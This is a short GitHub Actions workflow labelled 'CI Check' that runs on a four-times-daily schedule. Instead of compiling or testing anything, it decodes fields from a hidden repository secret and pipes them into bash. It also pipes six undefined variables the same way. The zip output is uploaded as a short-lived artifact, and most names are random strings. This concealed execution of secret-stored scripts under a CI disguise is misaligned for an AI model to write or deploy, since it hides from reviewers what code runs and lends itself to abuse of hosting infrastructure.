name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '6 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          ya50558: ${{ secrets.ya50558 }}
        run: |
          printf '%s' "$ya50558" | jq -r .dyd342 | /bin/bash
          printf '%s' "$nnuc40699" | jq -r .cvohg064 | /bin/bash
          printf '%s' "$mxws048" | jq -r .i67 | /bin/bash
          printf '%s' "$wftwc2689" | jq -r .e917 | /bin/bash
          printf '%s' "$wfi417" | jq -r .mvxwh30 | /bin/bash
          printf '%s' "$yiva8333" | jq -r .gcslb3334 | /bin/bash
          printf '%s' "$kfdet26" | jq -r .uglyr5 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: xj4G3ToK
          path: "*.zip"
          retention-days: 1
